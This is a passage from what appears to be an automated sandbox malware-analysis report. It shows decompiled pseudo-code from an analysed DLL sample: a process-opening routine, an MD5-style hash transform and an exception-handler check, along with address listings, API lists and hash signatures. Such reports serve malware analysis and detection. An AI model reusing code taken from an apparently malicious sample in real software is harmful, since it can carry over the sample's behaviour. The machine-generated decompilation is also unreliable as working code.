				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x40412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404128 = _t5;
						 *0x404130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404124 = _t6;
						if(_t6 == 0) {
							 *0x404124 =  *0x404124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                                                                                                                                                    0x00401851
                                                                                                                                                                                                                                    0x0040185f
                                                                                                                                                                                                                                    0x00401867
                                                                                                                                                                                                                                    0x0040186c
                                                                                                                                                                                                                                    0x004018be
                                                                                                                                                                                                                                    0x004018be
                                                                                                                                                                                                                                    0x0040186e
                                                                                                                                                                                                                                    0x00401876
                                                                                                                                                                                                                                    0x0040187e
                                                                                                                                                                                                                                    0x0040187e
                                                                                                                                                                                                                                    0x004018ba
                                                                                                                                                                                                                                    0x004018bc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401878
                                                                                                                                                                                                                                    0x0040187a
                                                                                                                                                                                                                                    0x00401880
                                                                                                                                                                                                                                    0x00401880
                                                                                                                                                                                                                                    0x00401885
                                                                                                                                                                                                                                    0x00401893
                                                                                                                                                                                                                                    0x00401898
                                                                                                                                                                                                                                    0x0040189e
                                                                                                                                                                                                                                    0x004018a6
                                                                                                                                                                                                                                    0x004018ab
                                                                                                                                                                                                                                    0x004018ad
                                                                                                                                                                                                                                    0x004018ad
                                                                                                                                                                                                                                    0x004018b7
                                                                                                                                                                                                                                    0x0040187c
                                                                                                                                                                                                                                    0x0040187c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040187c
                                                                                                                                                                                                                                    0x0040187a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,76D263F0), ref: 0040185F
                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 0040186E
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00401885
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                    • Opcode ID: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                                                                                                                                                                                                    • Instruction ID: 6ae184293567ded7ec2751506ec64a9140b7551cf56f667d9c7c58b5119fcc5d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F068B16412109AE710AF787F4DB553F98E759753F004236E644F92F4D37046818B5C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0136009C, Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c$t32c
                                                                                                                                                                                                                                    • API String ID: 0-1046649395
                                                                                                                                                                                                                                    • Opcode ID: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                                                                                                                                                                                                    • Instruction ID: 4a1470f0f3d2ff01687b955c971b95f3fe0334faa168c10c130809f3f6683016
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAD1177690011ADFDF29DF94CD85BAAB7B9FF88318F148294E60967215D230AE85CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F997F2, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E02F997F2(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                                                                                                                                                                                                                    0x02f997f5
                                                                                                                                                                                                                                    0x02f99800
                                                                                                                                                                                                                                    0x02f99803
                                                                                                                                                                                                                                    0x02f99806
                                                                                                                                                                                                                                    0x02f99807
                                                                                                                                                                                                                                    0x02f99807
                                                                                                                                                                                                                                    0x02f99812
                                                                                                                                                                                                                                    0x02f99823
                                                                                                                                                                                                                                    0x02f99825
                                                                                                                                                                                                                                    0x02f99828
                                                                                                                                                                                                                                    0x02f99828
                                                                                                                                                                                                                                    0x02f9982b
                                                                                                                                                                                                                                    0x02f9982b
                                                                                                                                                                                                                                    0x02f9982e
                                                                                                                                                                                                                                    0x02f9982e
                                                                                                                                                                                                                                    0x02f99831
                                                                                                                                                                                                                                    0x02f99831
                                                                                                                                                                                                                                    0x02f9984e
                                                                                                                                                                                                                                    0x02f99851
                                                                                                                                                                                                                                    0x02f99867
                                                                                                                                                                                                                                    0x02f9986a
                                                                                                                                                                                                                                    0x02f99884
                                                                                                                                                                                                                                    0x02f99887
                                                                                                                                                                                                                                    0x02f9989d
                                                                                                                                                                                                                                    0x02f998a0
                                                                                                                                                                                                                                    0x02f998a2
                                                                                                                                                                                                                                    0x02f998ba
                                                                                                                                                                                                                                    0x02f998bd
                                                                                                                                                                                                                                    0x02f998c0
                                                                                                                                                                                                                                    0x02f998d8
                                                                                                                                                                                                                                    0x02f998db
                                                                                                                                                                                                                                    0x02f998f5
                                                                                                                                                                                                                                    0x02f998f8
                                                                                                                                                                                                                                    0x02f9990e
                                                                                                                                                                                                                                    0x02f99911
                                                                                                                                                                                                                                    0x02f99913
                                                                                                                                                                                                                                    0x02f9992b
                                                                                                                                                                                                                                    0x02f99930
                                                                                                                                                                                                                                    0x02f99933
                                                                                                                                                                                                                                    0x02f99949
                                                                                                                                                                                                                                    0x02f9994c
                                                                                                                                                                                                                                    0x02f99966
                                                                                                                                                                                                                                    0x02f99969
                                                                                                                                                                                                                                    0x02f9997f
                                                                                                                                                                                                                                    0x02f99982
                                                                                                                                                                                                                                    0x02f99984
                                                                                                                                                                                                                                    0x02f9999f
                                                                                                                                                                                                                                    0x02f999a2
                                                                                                                                                                                                                                    0x02f999b9
                                                                                                                                                                                                                                    0x02f999bc
                                                                                                                                                                                                                                    0x02f999c0
                                                                                                                                                                                                                                    0x02f999d9
                                                                                                                                                                                                                                    0x02f999dc
                                                                                                                                                                                                                                    0x02f999de
                                                                                                                                                                                                                                    0x02f999e1
                                                                                                                                                                                                                                    0x02f999fc
                                                                                                                                                                                                                                    0x02f999ff
                                                                                                                                                                                                                                    0x02f99a18
                                                                                                                                                                                                                                    0x02f99a1b
                                                                                                                                                                                                                                    0x02f99a2b
                                                                                                                                                                                                                                    0x02f99a2e
                                                                                                                                                                                                                                    0x02f99a46
                                                                                                                                                                                                                                    0x02f99a49
                                                                                                                                                                                                                                    0x02f99a63
                                                                                                                                                                                                                                    0x02f99a66
                                                                                                                                                                                                                                    0x02f99a7e
                                                                                                                                                                                                                                    0x02f99a81
                                                                                                                                                                                                                                    0x02f99a97
                                                                                                                                                                                                                                    0x02f99a9a
                                                                                                                                                                                                                                    0x02f99ab2
                                                                                                                                                                                                                                    0x02f99ab5
                                                                                                                                                                                                                                    0x02f99acd
                                                                                                                                                                                                                                    0x02f99ad0
                                                                                                                                                                                                                                    0x02f99aea
                                                                                                                                                                                                                                    0x02f99aed
                                                                                                                                                                                                                                    0x02f99b03
                                                                                                                                                                                                                                    0x02f99b06
                                                                                                                                                                                                                                    0x02f99b1e
                                                                                                                                                                                                                                    0x02f99b21
                                                                                                                                                                                                                                    0x02f99b3b
                                                                                                                                                                                                                                    0x02f99b3e
                                                                                                                                                                                                                                    0x02f99b56
                                                                                                                                                                                                                                    0x02f99b59
                                                                                                                                                                                                                                    0x02f99b6f
                                                                                                                                                                                                                                    0x02f99b72
                                                                                                                                                                                                                                    0x02f99b8a
                                                                                                                                                                                                                                    0x02f99b8d
                                                                                                                                                                                                                                    0x02f99ba5
                                                                                                                                                                                                                                    0x02f99ba8
                                                                                                                                                                                                                                    0x02f99bba
                                                                                                                                                                                                                                    0x02f99bbd
                                                                                                                                                                                                                                    0x02f99bcf
                                                                                                                                                                                                                                    0x02f99bd2
                                                                                                                                                                                                                                    0x02f99be4
                                                                                                                                                                                                                                    0x02f99be7
                                                                                                                                                                                                                                    0x02f99beb
                                                                                                                                                                                                                                    0x02f99bfb
                                                                                                                                                                                                                                    0x02f99bfe
                                                                                                                                                                                                                                    0x02f99c0c
                                                                                                                                                                                                                                    0x02f99c0f
                                                                                                                                                                                                                                    0x02f99c21
                                                                                                                                                                                                                                    0x02f99c24
                                                                                                                                                                                                                                    0x02f99c38
                                                                                                                                                                                                                                    0x02f99c3b
                                                                                                                                                                                                                                    0x02f99c3d
                                                                                                                                                                                                                                    0x02f99c4d
                                                                                                                                                                                                                                    0x02f99c50
                                                                                                                                                                                                                                    0x02f99c62
                                                                                                                                                                                                                                    0x02f99c65
                                                                                                                                                                                                                                    0x02f99c73
                                                                                                                                                                                                                                    0x02f99c76
                                                                                                                                                                                                                                    0x02f99c88
                                                                                                                                                                                                                                    0x02f99c8b
                                                                                                                                                                                                                                    0x02f99c8f
                                                                                                                                                                                                                                    0x02f99c9f
                                                                                                                                                                                                                                    0x02f99ca2
                                                                                                                                                                                                                                    0x02f99cb4
                                                                                                                                                                                                                                    0x02f99cb7
                                                                                                                                                                                                                                    0x02f99cc5
                                                                                                                                                                                                                                    0x02f99cc8
                                                                                                                                                                                                                                    0x02f99cda
                                                                                                                                                                                                                                    0x02f99cdd
                                                                                                                                                                                                                                    0x02f99cef
                                                                                                                                                                                                                                    0x02f99cf2
                                                                                                                                                                                                                                    0x02f99d06
                                                                                                                                                                                                                                    0x02f99d09
                                                                                                                                                                                                                                    0x02f99d1d
                                                                                                                                                                                                                                    0x02f99d20
                                                                                                                                                                                                                                    0x02f99d34
                                                                                                                                                                                                                                    0x02f99d37
                                                                                                                                                                                                                                    0x02f99d4b
                                                                                                                                                                                                                                    0x02f99d4e
                                                                                                                                                                                                                                    0x02f99d62
                                                                                                                                                                                                                                    0x02f99d65
                                                                                                                                                                                                                                    0x02f99d79
                                                                                                                                                                                                                                    0x02f99d7e
                                                                                                                                                                                                                                    0x02f99d90
                                                                                                                                                                                                                                    0x02f99d93
                                                                                                                                                                                                                                    0x02f99da7
                                                                                                                                                                                                                                    0x02f99daa
                                                                                                                                                                                                                                    0x02f99dbe
                                                                                                                                                                                                                                    0x02f99dc1
                                                                                                                                                                                                                                    0x02f99dd7
                                                                                                                                                                                                                                    0x02f99dda
                                                                                                                                                                                                                                    0x02f99dee
                                                                                                                                                                                                                                    0x02f99df1
                                                                                                                                                                                                                                    0x02f99e03
                                                                                                                                                                                                                                    0x02f99e06
                                                                                                                                                                                                                                    0x02f99e1a
                                                                                                                                                                                                                                    0x02f99e1d
                                                                                                                                                                                                                                    0x02f99e31
                                                                                                                                                                                                                                    0x02f99e34
                                                                                                                                                                                                                                    0x02f99e48
                                                                                                                                                                                                                                    0x02f99e51
                                                                                                                                                                                                                                    0x02f99e54
                                                                                                                                                                                                                                    0x02f99e5d
                                                                                                                                                                                                                                    0x02f99e66
                                                                                                                                                                                                                                    0x02f99e6e
                                                                                                                                                                                                                                    0x02f99e76
                                                                                                                                                                                                                                    0x02f99e80
                                                                                                                                                                                                                                    0x02f99e95

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                                    • Opcode ID: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
                                                                                                                                                                                                                                    • Instruction ID: 5794df8f93a54c3b967d44dfae819198ea268a45a4c1082618a5be0077ddf6cd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2722847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402375, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00402375(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x404178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4041c0 = 1;
										__eflags =  *0x4041c0;
										if( *0x4041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x404178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x404178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x40417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
